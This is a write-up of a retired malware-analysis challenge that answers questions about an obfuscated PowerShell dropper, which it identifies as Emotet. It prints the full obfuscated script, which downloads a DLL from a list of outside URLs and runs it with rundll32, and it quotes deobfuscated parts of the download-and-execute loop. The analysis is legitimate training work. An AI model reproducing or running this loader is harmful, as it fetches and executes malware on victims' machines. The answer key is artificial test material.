For full text search please use the '?' prefix. e.g. ? Onboarding

Malicious PowerShell Analysis

Reading Material:
Link 1

  1. What security protocol is being used for the communication with a malicious domain? (3 points)

    Based on the PowerShell script, it's obvious that some form of encoding was used for the payload. It uses standard CLI arguments, giving me the impression that it's likely using base64. Decoding it with CyberChef gives us a semi-legible output, which we then need to run through Decode text with the encoding UTF-16LE (1200) to get the final output.

     sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') );    SeT-iTEM  ('vaR'+'IabLE'+':mBu') (  [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku  ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S');  ( vARiaBLe  ("m"+"bu")  -VAlueoN  )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6'+('F2'+'gd/'))."RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."s`PLIT"($C83R + $Cvmmq4o + $F10Q);$Q52M=('P'+('0'+'5K'));foreach ($Bm5pw6z in $B9fhbyv){try{(&('New'+'-Objec'+'t') SysTem.nEt.WEBcLIeNT)."do`WNl`OaD`FIlE"($Bm5pw6z, $Imd1yck);$Z10L=('A9'+'2Q');If ((&('Ge'+'t-It'+'em') $Imd1yck)."len`G`TH" -ge 35698) {&('r'+'undl'+'l32') $Imd1yck,(('Co'+'nt')+'r'+('ol'+'_RunD'+'L')+'L')."T`OSt`RiNG"();$R65I=('Z'+('09'+'B'));break;$K7_H=('F1'+'2U')}}catch{}}$W54I=(('V9'+'5')+'O')

    We can see in the following snippet that the HTTP portion of the URL is being inserted via replacement:

    "RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])

    If you actually look at where this is being called, the replaced strings have a trailing s, making the URLs use https. However, this isn't the answer they're looking for.

    We can find the answer in the snippet below, which is still legible:

    "sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'))

    Answer: TLS 12

  2. What directory does the obfuscated PowerShell create? (Starting from \HOME\) (4 points)

    Manually de-obfuscating the payload bit by bit, we eventually get the following relevant snippet:

    (DIr VariabLE:Mku  ).VaLUe::"CREATEDIRECTORY"($HOME + ('\Db_bh30\Yf5be5g\'));

    Answer: \HOME\Db_bh30\Yf5be5g\

  3. What file is being downloaded (full name)? (4 points)

    Another one of the deobfuscated snippets is:

    $Imd1yck=$HOME+'\Db_bh30\Yf5be5g\A69S.dll';

    Answer: A69S.dll

  4. What is used to execute the downloaded file? (3 points)

    The following snippet is still relevant:

    foreach ($Bm5pw6z in $B9fhbyv){try{(&('New-Object') SYSTEM.NET.WEBCLIENT)."DOWNLOAD`FILE"($Bm5pw6z, $Imd1yck);If ((&('Get-Item') $Imd1yck)."length" -ge 35698) {&('rundll32') $Imd1yck,('Control_RunDLL')."TOSTRING"();break;}}catch{}}

    Answer: rundll32

  5. What is the domain name of the URI ending in ‘/6F2gd/’ (3 points)

    The full URL is:

    http://wm.mcdevelop.net/content/6F2gd/

    Answer: wm.mcdevelop.net

  6. Based on the analysis of the obfuscated code, what is the name of the malware? (3 points)

    Searching Google for A69S.dll malware shows us an ANY.RUN page that flags the file as emotet.

    Answer: emotet

Tags

  1. powershell (Private)
  2. malware (Private)
  3. 20 points (Private)
  4. retired (Private)